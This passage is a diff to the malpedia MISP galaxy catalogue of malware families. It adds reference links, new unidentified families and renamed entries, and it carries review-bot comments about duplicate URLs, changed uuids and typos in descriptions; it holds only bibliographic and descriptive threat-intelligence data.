  "https://www.cyberbit.com/blog/endpoint-security/latest-trickbot-variant-has-new-tricks-up-its-sleeve/",
@@ -30773,21 +35068,26 @@
  "https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89",
  "https://technical.nttsecurity.com/post/102fnog/targeted-trickbot-activity-drops-powerbrace-backdoor",
  "https://medium.com/@vishal_29486/trickbot-a-concise-treatise-d7e4cc97f737",
- "https://www.secureworks.com/blog/trickbot-modifications-target-us-mobile-users",
+ "https://www.cybereason.com/blog/cybereason-vs.-ryuk-ransomware",
+ "https://www.zscaler.com/blogs/security-research/new-trickbot-and-bazarloader-campaigns-use-multiple-delivery-vectors",
  "https://blog.trendmicro.com/trendlabs-security-intelligence/latest-trickbot-campaign-delivered-via-highly-obfuscated-js-file/",
+ "https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/",
  "https://www.secureworks.com/research/threat-profiles/gold-swathmore",
  "https://twitter.com/anthomsec/status/1321865315513520128",
  "https://www.hhs.gov/sites/default/files/bazarloader.pdf",
  "https://www.cert.pl/en/news/single/detricking-trickbot-loader/",
+ "https://community.riskiq.com/article/298c9fc9",
  "https://labs.sentinelone.com/building-a-custom-malware-analysis-lab-environment/",
  "https://blog.talosintelligence.com/2020/03/trickbot-primer.html",
+ "https://www.deepinstinct.com/2019/07/12/trickbooster-trickbots-email-based-infection-module/",
  "https://www.ringzerolabs.com/2017/07/trickbot-banking-trojan-doc00039217doc.html",
  "https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html",
  "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
  "https://public.intel471.com/blog/trickbot-online-emotet-microsoft-cyber-command-disruption-attempts/",
  "https://www.botconf.eu/wp-content/uploads/2016/11/2016-LT09-TrickBot-Adams.pdf",
  "https://public.intel471.com/blog/global-trickbot-disruption-operation-shows-promise/",
- "https://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html",
+ "https://threatresearch.ext.hp.com/detecting-a-stealthy-trickbot-campaign/",
+ "https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group",
  "https://www.welivesecurity.com/wp-content/uploads/2021/02/ESET_Threat_Report_Q42020.pdf",
  "https://na.eventscloud.com/file_uploads/6568237bca6dc156e5c5557c5989e97c_CrowdStrikeFal.Con2019_ThroughEyesOfAdversary_J.Ayers.pdf",
  "http://www.vkremez.com/2017/11/lets-learn-trickbot-socks5-backconnect.html",
@@ -30807,26 +35107,37 @@
  "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
  "https://blog.fraudwatchinternational.com/malware/trickbot-malware-works",
  "https://www.justice.gov/opa/pr/officials-announce-international-operation-targeting-transnational-criminal-organization",
+ "https://www.proofpoint.com/us/blog/security-briefs/threat-actors-pair-tax-themed-lures-covid-19-healthcare-themes",
  "https://f5.com/labs/articles/threat-intelligence/malware/trickbot-expands-global-targets-beyond-banks-and-payment-processors-to-crms",
  "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
  "https://blogs.keysight.com/blogs/tech/nwvs.entry.html/2020/12/21/trickbot_a_closerl-TpQ0.html",
+ "https://www.kryptoslogic.com/blog/2021/07/trickbot-and-zeus/",
+ "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/",
  "https://www.microsoft.com/security/blog/2020/10/12/trickbot-disrupted/",
+ "http://www.secureworks.com/research/threat-profiles/gold-blackburn",
  "https://blog.malwarebytes.com/threat-analysis/malware-threat-analysis/2018/11/whats-new-trickbot-deobfuscating-elements/",
  "https://www.bleepingcomputer.com/news/security/lightbot-trickbot-s-new-reconnaissance-malware-for-high-value-targets/",
+ "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/",
+ "https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor",
  "https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes",
+ "https://us-cert.cisa.gov/ncas/alerts/aa21-076a",
  "https://www.wilbursecurity.com/2020/03/trickbot-to-ryuk-in-two-hours/",
  "https://www.sneakymonkey.net/2019/05/22/trickbot-analysis/",
  "https://www.washingtonpost.com/national-security/cyber-command-trickbot-disrupt/2020/10/09/19587aae-0a32-11eb-a166-dc429b380d10_story.html",
  "https://medium.com/walmartglobaltech/anchor-and-lazarus-together-again-24744e516607",
+ "https://www.splunk.com/en_us/blog/security/detecting-trickbots.html",
+ "https://medium.com/walmartglobaltech/trickbot-crews-new-cobaltstrike-loader-32c72b78e81c",
  "https://www.sneakymonkey.net/2019/10/29/trickbot-analysis-part-ii/",
- "https://securityintelligence.com/tricks-of-the-trade-a-deeper-look-into-trickbots-machinations/",
+ "https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them",
  "http://www.pwc.co.uk/issues/cyber-security-data-privacy/research/trickbots-bag-of-tricks.html",
+ "https://www.securityartwork.es/wp-content/uploads/2017/06/Informe_Evoluci%C3%B3n_Trickbot.pdf",
  "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
  "https://content.fireeye.com/m-trends/rpt-m-trends-2020",
  "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf",
  "https://www.vkremez.com/2018/11/lets-learn-introducing-latest-trickbot.html",
  "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf",
  "https://www.youtube.com/watch?v=lTywPmZEU1A",
+ "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
  "https://www.secureworks.com/research/threat-profiles/gold-blackburn",
  "https://www.fortinet.com/blog/threat-research/global-malicious-spam-campaign-using-black-lives-matter-as-a-lure",
  "https://engineering.salesforce.com/easily-identify-malicious-servers-on-the-internet-with-jarm-e095edac525a",
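Review bot: The added `"http://www.secureworks.com/research/threat-profiles/gold-blackburn"` duplicates `"https://www.secureworks.com/research/threat-profiles/gold-blackburn"`, which is already a context line a few entries further down in this same hunk, differing only in scheme; the plain-http copy should be dropped rather than kept as a second reference. Likewise `https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/` added here and `https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/` added at L498 appear to be the English and Japanese versions of the same article. A de-duplication step that normalises the scheme before refs are emitted would catch the first case automatically.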
@@ -30837,11 +35148,13 @@
  "https://blog.malwarebytes.com/threat-analysis/2017/08/trickbot-comes-with-new-tricks-attacking-outlook-and-browsing-data/",
  "https://malware.love/trickbot/malware_analysis/reverse_engineering/2020/11/17/trickbots-latest-trick.html",
  "http://www.peppermalware.com/2019/03/quick-analysis-of-trickbot-sample-with.html",
+ "https://medium.com/walmartglobaltech/inside-the-systembc-malware-as-a-service-9aa03afd09c6",
  "https://blog.malwarebytes.com/threat-analysis/2016/10/trick-bot-dyrezas-successor/",
  "https://www.youtube.com/watch?v=KMcSAlS9zGE",
  "https://cofenselabs.com/all-you-need-is-text-second-wave/",
  "https://news.sophos.com/en-us/2020/02/18/nearly-a-quarter-of-malware-now-communicates-using-tls/",
  "https://labs.sentinelone.com/revealing-the-trick-a-deep-dive-into-trickloader-obfuscation/",
+ "https://www.justice.gov/opa/pr/latvian-national-charged-alleged-role-transnational-cybercrime-organization",
  "http://www.vkremez.com/2018/04/lets-learn-trickbot-implements-network.html",
  "https://unit42.paloaltonetworks.com/ryuk-ransomware/",
  "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/trickbot-botnet-ransomware-disruption",
@@ -30862,13 +35175,16 @@
  "https://www.domaintools.com/resources/blog/tracking-a-trickbot-related-ransomware-incident",
  "https://blog.lumen.com/a-look-inside-the-trickbot-botnet/",
  "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-attacked-epiq-global-via-trickbot-infection/",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
  "https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/",
- "https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them",
- "https://www.cybereason.com/blog/cybereason-vs.-ryuk-ransomware",
+ "https://securityintelligence.com/tricks-of-the-trade-a-deeper-look-into-trickbots-machinations/",
+ "https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf",
  "https://www.heise.de/security/artikel/Emotet-Trickbot-Ryuk-ein-explosiver-Malware-Cocktail-4573848.html",
+ "https://www.bitdefender.com/files/News/CaseStudies/study/399/Bitdefender-PR-Whitepaper-Trickbot-creat5515-en-EN.pdf",
  "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
  "http://blog.fortinet.com/2016/12/06/deep-analysis-of-the-online-banking-botnet-trickbot",
- "https://threatresearch.ext.hp.com/detecting-a-stealthy-trickbot-campaign/",
+ "https://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html",
+ "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
  "https://www.fortinet.com/blog/threat-research/new-variant-of-trickbot-being-spread-by-word-document.html",
  "http://www.malware-traffic-analysis.net/2018/02/01/",
  "https://www.flashpoint-intel.com/blog/new-version-trickbot-adds-worm-propagation-module/",
@@ -30883,7 +35199,10 @@
  "https://labs.sentinelone.com/deep-dive-into-trickbot-executor-module-mexec-hidden-anchor-bot-nexus-operations/",
  "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors",
  "https://www.fidelissecurity.com/threatgeek/2016/10/trickbot-we-missed-you-dyre",
+ "https://therecord.media/trickbot-new-attacks-see-the-botnet-deploy-new-banking-module-new-ransomware/",
+ "https://www.bleepingcomputer.com/news/security/trickbot-gang-developer-arrested-when-trying-to-leave-korea/",
  "https://eclypsium.com/2020/12/03/trickbot-now-offers-trickboot-persist-brick-profit/",
+ "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware",
  "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2021-threat-report.pdf",
  "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/",
  "https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/",
@@ -30891,7 +35210,7 @@
  "https://www.kryptoslogic.com/blog/2021/02/trickbot-masrv-module/",
  "https://securityintelligence.com/trickbot-takes-to-latin-america-continues-to-expand-its-global-reach/",
  "https://unit42.paloaltonetworks.com/goodbye-mworm-hello-nworm-trickbot-updates-propagation-module/",
- "https://www.securityartwork.es/wp-content/uploads/2017/06/Informe_Evoluci%C3%B3n_Trickbot.pdf",
+ "https://www.secureworks.com/blog/trickbot-modifications-target-us-mobile-users",
  "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
  "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
  "https://www.berlin.de/sen/justva/presse/pressemitteilungen/2020/pm-11-2020-t-systems-forensik_bericht_public_v1.pdf",
@@ -30901,30 +35220,37 @@
 "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
 "https://escinsecurity.blogspot.de/2018/01/weekly-trickbot-analysis-end-of-wc-22.html",
 "https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
 "https://www.bleepingcomputer.com/news/security/trickbot-now-steals-windows-active-directory-credentials/",
 "https://www.fortinet.com/blog/threat-research/deep-analysis-of-trickbot-new-module-pwgrab.html",
 "https://labs.sentinelone.com/deep-dive-into-trickbot-executor-module-mexec-reversing-the-dropper-variant/",
 "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf",
 "https://krebsonsecurity.com/2020/10/attacks-aimed-at-disrupting-the-trickbot-botnet/",
 "https://www.secureworks.com/research/threat-profiles/gold-ulrick",
+ "https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/",
+ "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
 "https://twitter.com/VK_Intel/status/1328578336021483522",
 "https://www.bleepingcomputer.com/news/security/emotet-trickbot-malware-duo-is-back-infecting-windows-machines/",
 "https://inquest.net/blog/2019/08/26/TrickBot-Memory-Analysis",
 "https://duo.com/decipher/trickbot-up-to-its-old-tricks",
 "https://labs.sentinelone.com/inside-a-trickbot-cobaltstrike-attack-server/",
 "https://hurricanelabs.com/splunk-tutorials/splunking-with-sysmon-part-4-detecting-trickbot/",
- "https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/",
+ "https://securelist.com/financial-cyberthreats-in-2020/101638/",
 "https://cybersecurity.att.com/blogs/labs-research/trickbot-bazarloader-in-depth",
 "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf",
 "https://public.intel471.com/blog/partners-in-crime-north-koreans-and-elite-russian-speaking-cybercriminals/",
 "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
+ "https://therecord.media/us-arrests-latvian-woman-who-worked-on-trickbot-malware-source-code/",
 "https://www.youtube.com/watch?v=EdchPEHnohw",
+ "https://intel471.com/blog/ettersilent-maldoc-builder-macro-trickbot-qbot/",
 "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
 "https://www.fireeye.com/blog/threat-research/2020/03/the-cycle-of-adversary-pursuit.html",
 "https://redcanary.com/resources/webinars/deep-dive-process-injection/",
 "https://www.bleepingcomputer.com/news/security/malware-tries-to-trump-security-software-with-potus-impeachment/",
 "https://unit42.paloaltonetworks.com/trickbot-campaign-uses-fake-payroll-emails-to-conduct-phishing-attacks/",
- "https://osint.fans/service-nsw-russia-association"
+ "https://osint.fans/service-nsw-russia-association",
+ "https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/",
+ "https://thedfirreport.com/2021/05/02/trickbot-brief-creds-and-beacons/"
 ],
 "synonyms": [
 "TheTrick",
@@ -30941,18 +35267,20 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.triton",
+ "https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html",
 "https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html",
 "https://www.eenews.net/stories/1060123327/",
 "https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware",
 "https://home.treasury.gov/news/press-releases/sm1162",
- "https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%E2%80%94Safety%20System%20Targeted%20Malware_S508C.pdf",
- "https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html",
+ "https://dragos.com/blog/trisis/TRISIS-01.pdf",
+ "https://us-cert.cisa.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%20-%20Safety%20System%20Targeted%20Malware%20%28Update%20A%29_S508C.PDF",
 "https://github.com/ICSrepo/TRISIS-TRITON-HATMAN",
 "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors",
 "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1538425180.pdf",
+ "https://www.domaintools.com/resources/blog/visibility-monitoring-and-critical-infrastructure-security",
 "https://securelist.com/apt-trends-report-q2-2019/91897/",
- "https://dragos.com/blog/trisis/TRISIS-01.pdf",
- "https://www.domaintools.com/resources/blog/visibility-monitoring-and-critical-infrastructure-security"
+ "https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%E2%80%94Safety%20System%20Targeted%20Malware_S508C.pdf",
+ "https://www.nozominetworks.com//downloads/US/Nozomi-Networks-TRITON-The-First-SIS-Cyberattack.pdf"
 ],
 "synonyms": [
 "HatMan",
@@ -31086,6 +35414,8 @@
 "https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity"
 ],
 "synonyms": [
+ "BigBoss",
+ "Cacao",
 "GoldenSky",
 "HyperStack"
 ],
@@ -31535,23 +35865,9 @@
 "synonyms": [],
 "type": []
 },
- "uuid": "498a794c-64f9-4337-ac71-a3ff3cb53c68",
+ "uuid": "45d78ad1-6b31-423d-8c90-9bea0934c218",
 "value": "win.unidentified_059"
 },
- {
- "description": "Unidentified sideloader used by EmissaryPanda",
- "meta": {
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_060",
- "https://norfolkinfosec.com/emissary-panda-dll-backdoor/",
- "https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/"
- ],
- "synonyms": [],
- "type": []
- },
- "uuid": "84f43641-77bc-4dcb-a104-150e8574da22",
- "value": "Unidentified 060"
- },
 {
 "description": "Was previously wrongly tagged as PoweliksDropper, now looking for additional context.",
 "meta": {
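Review bot: The second hunk replaces the `uuid` of the existing element `win.unidentified_059` (`498a794c-64f9-4337-ac71-a3ff3cb53c68` becomes `45d78ad1-6b31-423d-8c90-9bea0934c218`) and drops the `Unidentified 060` element (`84f43641-77bc-4dcb-a104-150e8574da22`) together with its three references. In a galaxy cluster the uuid is the stable identifier that sightings, relationships and other clusters correlate on, so a changed or removed uuid silently orphans anything that referenced it. If the upstream generator regenerated these ids, the old ones should be preserved (or the replacement recorded in the commit message) rather than rewritten; if `Unidentified 060` was merged into another family, that family's element is the place to carry the EmissaryPanda references.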
@@ -31748,6 +36064,72 @@
 "uuid": "99099489-eeb9-415a-a3b8-6133e774bed0",
 "value": "Unidentified 078 (Zebrocy Nim Loader?)"
 },
+ {
+ "description": "This Trojan is a full-featured RAT capable of executing common tasks such as command execution and downloading/uploading files. This is implemented through a couple dozen C++ classes such as CMFile, CMFile, CMProcess, TFileDownload, TDrive, TProcessInfo, TSock, etc. The first stage custom installer utilizes the same classes. The Trojan uses HTTP Server API to filter HTTPS packets at port 443 and parse commands. \r\nIt is also used by attackers to gather a target’s data, make lateral movements and create SOCKS tunnels to their C2 using the Earthworm tunneler.Given that the Trojan is an HTTPS server itself, the SOCKS tunnel is used for targets without an external IP, so the C2 is able to send commands.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_080",
+ "https://securelist.com/luckymouse-ndisproxy-driver/87914/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "f12b3029-87a1-4632-855f-4fef784210bd",
+ "value": "Unidentified 080"
+ },
+ {
+ "description": "Kaspersky Labs observed Andariel to drop this ransomware in one case within a series of attacks carried out against targets in South Korea in April 2021.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_081",
+ "https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "2eb8ca65-186b-44ae-bd91-189b3eb5ed54",
+ "value": "Unidentified 081 (Andariel Ransomware)"
+ },
+ {
+ "description": "This is third stage backdoor mentioned in the Kaspersky blog, \"Andariel evolves to target South Korea with ransomware\". The third stage payload was created via the second stage payload, is interactively executed in the operation and exists in both x64 and x86 versions. Most of them use Internet Explorer or Google Chrome icons and corresponding file names to disguise themselves as legitimate internet browsers. The malware decrypts the embedded payload at runtime. It uses an embedded 16-byte XOR key to decrypt the base64 encoded payload. The decrypted payload is another portable executable file that runs in memory. Before getting decrypted with a hardcoded XOR key, the backdoor also checks for sandbox environment.\r\nThe backdoor has some code overlap with a know malware family PEBBLEDASH, attributed to Lazarus/LABYRINTH CHOLLIMA.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_082",
+ "https://www.brighttalk.com/webcast/18282/493986",
+ "https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "082d2e86-d320-43cf-a602-f7bee7e3f3d4",
+ "value": "Unidentified 082"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_083",
+ "https://www.intezer.com/blog/malware-analysis/targeted-phishing-attack-against-ukrainian-government-expands-to-georgia/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "438ab9a3-3e2b-4241-8bcb-e61c2d118772",
+ "value": "Unidentified 083 (AutoIT Stealer)"
+ },
+ {
+ "description": "A RAT written in .NET, potentially used by Transparent Tribe.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_085",
+ "https://blog.cyble.com/2021/09/14/apt-group-targets-indian-defense-officials-through-enhanced-ttps/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "f80e8948-8e1e-4ecf-8d5e-08148e4dd2b0",
+ "value": "Unidentified 085"
+ },
 {
 "description": "",
 "meta": {
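Review bot: The new `description` strings for `Unidentified 080` and `Unidentified 082` carry copy errors that will be shown verbatim to every consumer of this galaxy. In the 080 entry the class list repeats `CMFile, CMFile,` and `tunneler.Given` is missing a space after the period; in the 082 entry `This is third stage backdoor` should read `This is the third-stage backdoor` and `a know malware family PEBBLEDASH` should read `a known malware family, PEBBLEDASH`. The `\r\n` sequences inside both descriptions are also unusual for this file, where the other descriptions in the same hunk are single-line prose; if the upstream text was pasted with Windows line endings, normalising them before export would keep the field consistent.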
@@ -31811,12 +36193,15 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.urlzone",
+ "https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta544-targets-geographies-italy-japan-range-malware",
 "https://www.gdatasoftware.com/blog/2013/12/23978-bebloh-a-well-known-banking-trojan-with-noteworthy-innovations",
 "https://www.johannesbader.ch/2015/01/the-dga-of-shiotob/",
 "https://krebsonsecurity.com/2011/07/trojan-tricks-victims-into-transfering-funds/",
- "https://www.virusbulletin.com/virusbulletin/2012/09/urlzone-reloaded-new-evolution/",
+ "https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much",
 "https://www.fireeye.com/blog/threat-research/2016/01/urlzone_zones_inon.html",
+ "https://www.proofpoint.com/us/threat-insight/post/urlzone-top-malware-japan-while-emotet-and-line-phishing-round-out-landscape-0",
 "https://mp.weixin.qq.com/s/NRytT94ne5gKN31CSLq6GA",
+ "https://www.virusbulletin.com/virusbulletin/2012/09/urlzone-reloaded-new-evolution/",
 "https://www.cybereason.com/blog/new-ursnif-variant-targets-japan-packed-with-new-features",
 "https://www.crowdstrike.com/blog/cutwail-spam-campaign-uses-steganography-to-distribute-urlzone/",
 "https://www.proofpoint.com/us/threat-insight/post/Vawtrak-UrlZone-Banking-Trojans-Target-Japan",
@@ -31844,6 +36229,7 @@
 "https://www.circl.lu/pub/tr-25/",
 "https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified",
 "https://www.gdatasoftware.com/blog/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence",
+ "https://securelist.com/analysis/publications/65545/the-epic-turla-operation/",
 "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf",
 "https://www.gdatasoftware.com/blog/2014/02/23968-uroburos-highly-complex-espionage-software-with-russian-roots",
 "https://www.gdatasoftware.com/blog/2014/06/23953-analysis-of-uroburos-using-windbg",
@@ -31890,6 +36276,7 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.vadokrist",
+ "https://www.welivesecurity.com/wp-content/uploads/2021/05/eset_threat_report_t12021.pdf",
 "https://www.welivesecurity.com/2021/01/21/vadokrist-wolf-sheeps-clothing/"
 ],
 "synonyms": [],
@@ -31916,6 +36303,7 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.valuevault",
+ "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae",
 "https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html",
 "https://intezer.com/blog-new-iranian-campaign-tailored-to-us-companies-uses-updated-toolset/"
 ],
@@ -31957,12 +36345,16 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.vawtrak",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
 "https://www.blueliv.com/downloads/network-insights-into-vawtrak-v2.pdf",
+ "https://fidelissecurity.com/threatgeek/archive/me-and-mr-robot-tracking-actor-behind-man1-crypter/",
 "https://info.phishlabs.com/blog/the-unrelenting-evolution-of-vawtrak",
 "https://threatpost.com/pos-attacks-net-crooks-20-million-stolen-bank-cards/117595/",
+ "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
 "http://thehackernews.com/2017/01/neverquest-fbi-hacker.html",
 "https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/",
- "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/"
+ "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/",
+ "https://www.secureworks.com/research/dyre-banking-trojan"
 ],
 "synonyms": [
 "Catch",
@@ -32004,7 +36396,7 @@
 "type": []
 },
 "uuid": "5490d2c7-72db-42cf-a1a4-02be1b3ade5f",
- "value": "Velso Ransomware"
+ "value": "Velso"
 },
 {
 "description": "",
@@ -32048,6 +36440,19 @@
 "uuid": "7a0137ad-df7a-4fae-8365-eb36cc7e60cd",
 "value": "Venus Locker"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vermilion_strike",
+ "https://www.intezer.com/blog/malware-analysis/vermilionstrike-reimplementation-cobaltstrike/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "f2db1f70-a284-42c1-9f5a-4b2f46dc8868",
+ "value": "Vermilion Strike (Windows)"
+ },
 {
 "description": "",
 "meta": {
@@ -32083,7 +36488,8 @@
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.vhd_ransomware",
 "https://securelist.com/apt-trends-report-q2-2020/97937/",
 "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/",
- "https://twitter.com/GrujaRS/status/1241657443282825217"
+ "https://twitter.com/GrujaRS/status/1241657443282825217",
+ "https://seguranca-informatica.pt/secrets-behind-the-lazaruss-vhd-ransomware/"
 ],
 "synonyms": [],
 "type": []
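Review bot: Renaming `value` from `"Velso Ransomware"` to `"Velso"` changes the string that consumers match on, and the same rename pattern appears for `Void` / `VoidCrypt` in the hunk at `@@ -32190` and for `WannaRen` in the hunk at `@@ -32365`. In MISP the galaxy tag is derived from `value` (here of the form `misp-galaxy:malpedia="Velso Ransomware"`), so events already tagged with the old name stop resolving to this element even though the `uuid` is unchanged. If the shorter names are the intended canonical form, keeping the old name as an entry in `synonyms` (`"synonyms": ["Velso Ransomware"]`) would preserve lookups; the same applies to the `"VoidCrypt Ransomware"` synonym that is dropped rather than kept alongside `"VoidCrypt"`.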
@@ -32096,11 +36502,17 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar",
+ "https://medium.com/s2wlab/deep-analysis-of-vidar-stealer-ebfc3b557aed",
 "https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware",
 "https://medium.com/s2wlab/w1-feb-en-story-of-the-week-stealers-on-the-darkweb-49945a31601d",
 "https://www.bleepingcomputer.com/news/security/gandcrab-operators-use-vidar-infostealer-as-a-forerunner/",
 "https://tccontre.blogspot.com/2019/03/infor-stealer-vidar-trojanspy-analysis.html",
 "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://twitter.com/sisoma2/status/1409816282065743872",
+ "https://docs.google.com/spreadsheets/d/1nx42rdMdkCrvlmACDi3CHseyG87iSV1Y6rGZYq_-oDk",
+ "https://www.trendmicro.com/en_us/research/21/i/fake-installers-drop-malware-and-open-doors-for-opportunistic-attackers.html",
+ "https://blog.minerva-labs.com/vidar-stealer-evasion-arsenal",
+ "https://asec.ahnlab.com/en/22932/",
 "https://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/"
 ],
 "synonyms": [],
@@ -32109,6 +36521,25 @@
 "uuid": "1f44c08a-b427-4496-9d6d-909b6bf34b9b",
 "value": "vidar"
 },
+ {
+ "description": "Wiper malware discovered by Japanese security firm Mitsui Bussan Secure Directions (MBSD), which is assumed to target Japan, the host country of the 2021 Summer Olympics. In addition to targeting common file Office-related files, it specifically targets file types associated with the Japanese word processor Ichitaro.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vigilant_cleaner",
+ "https://www.mbsd.jp/research/20210721/blog/",
